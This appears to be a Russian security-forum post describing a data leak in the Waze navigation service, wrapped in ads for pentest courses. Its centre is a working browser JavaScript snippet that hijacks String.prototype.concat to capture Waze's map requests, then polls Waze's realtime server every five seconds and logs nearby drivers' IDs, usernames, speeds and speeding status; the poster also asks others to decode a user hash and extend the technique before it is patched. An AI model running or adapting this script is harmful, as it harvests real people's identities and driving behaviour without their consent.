• 🚨 24 часа до повышения цены на курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    Последний день записи в текущий поток по старой цене Подробнее о курсе ...

Уязвимость в навигационном сервисе Waze.

InetTester

Green Team
21.10.2018
308
43
Добрый вечер.

Не уверен что это совсем грамотно называть уязвимостью, но тем не менее с помощью небольшого JS скрипта удается получить информацию которую разработчики 100% не планировали афишировать, а именно о скорости авто в заданном регионе, бонусом идет то что если человек авторизован то проскакивает именно его логин. количество запросов естественно сильно зависит от страны и регина, данную 'новость' я еще не видел на этом ресурсе поэтому посчитал что она будет весьма актуальна.

JavaScript:
virtualRadar = function(url){
    console.log("=====================================");
    request = new XMLHttpRequest();
    request.addEventListener('load', function(ret){
        JSON.parse(ret.target.response).users.map(e=>{
            check = new XMLHttpRequest();
            check.open('GET', 'https://www.waze.com/row-WAS/app/getStreet?lat='+e.location.y+'&lon='+e.location.x+'&radius=0.0005');
            check.addEventListener('load', (function(d, r){
                try {
                var allowedSpeed = JSON.parse(r.target.response)[0].toFromMaxSpeed,
                    currentSpeed = Math.floor(d.speed*36/10);
                if (currentSpeed >= 30 && allowedSpeed >= 30)
                    console.log('%c ('+d.id+') '+d.userName + ': '+ currentSpeed+' km/h <> '+ allowedSpeed+' km/h', currentSpeed > allowedSpeed ? 'color:red':'color: #000');

            } catch (e){}; }).bind(null, e));
            check.send(null);
        });
    });
    request.open('get', url);
    request.send();
};
vRadarInterval = null;
if (!String.prototype.concat2)  String.prototype.concat2 = String.prototype.concat;
String.prototype.concat = function (){
    var ret="", args = [].slice.call(arguments);
    for (var i in args) ret = String.prototype.concat2(ret, args[i])
     ret = String.prototype.concat2(this.valueOf(),ret);
    test = /TGeoRSS\?bottom\=([0-9\.\-]*)\&left\=([0-9\.\-]*)\&ma\=([0-9\.\-]*)\&mj\=([0-9\.\-]*)&mu\=([0-9\.\-]*)\&right\=([0-9\.\-]*)\&top\=([0-9\.\-]*)/.exec(ret);
    if (test){
         clearInterval(vRadarInterval);
         vRadarInterval = setInterval(virtualRadar.bind(null, "https://www.waze.com/row-rtserver/web/"+test[0]), 5000);
    }
    return ret;
}

Было бы интересно если у форумчан получилось бы узнать 'что' именно представляет из себя данный хеш и развить данную идею, если это конечно возможно, и пока данный баг не пофиксили:

user-1267595432/eda8d84d-7906-387d-80ad-bb92869e6a04
 

Вложения

  • waze.jpg
    waze.jpg
    181,6 КБ · Просмотры: 479
Последнее редактирование:
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Курс AD